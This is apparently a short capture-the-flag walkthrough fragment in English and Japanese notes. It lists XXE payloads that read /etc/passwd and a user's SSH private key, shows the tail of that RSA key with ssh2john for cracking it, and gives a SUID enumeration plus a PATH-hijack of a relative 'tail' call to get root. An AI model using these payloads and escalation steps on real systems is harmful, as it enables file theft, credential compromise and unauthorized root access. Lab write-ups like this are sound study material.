<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY example "XML Injection"> ]>
<comment>
<name>Joe Hamd</name>
<author>&example;</author>
<com>Test paragraph</com>
</comment>`

`<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY xxe **SYSTEM** 'file:///etc/passwd'>]>
<comment>
<name>Joe Hamd</name>
<author>Joe</author>
<com>&xxe;</com>
</comment>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM 'file:////home/barry/.ssh/id_rsa'>]>
<comment>
<name>Joe Hamd</name>
<author>Joe</author>
<com>&xxe;</com>
</comment>
7mxN/N5LlosTefJnlhdIhIDTDMsEwjACA+q686+bREd+drajgk6R9eKgSME7geVD
-----END RSA PRIVATE KEY-----`
- ssh2john

### root

- `find / -perm -u=s -type f 2>/dev/null`
    - live_log を見つける
    - 権限 s
    - strings で tail を見つける
    - 絶対パスじゃないのでパスを追加
    - /tmp に tail → /bin/bash を作成
    - `export PATH=”/tmp:$PATH”`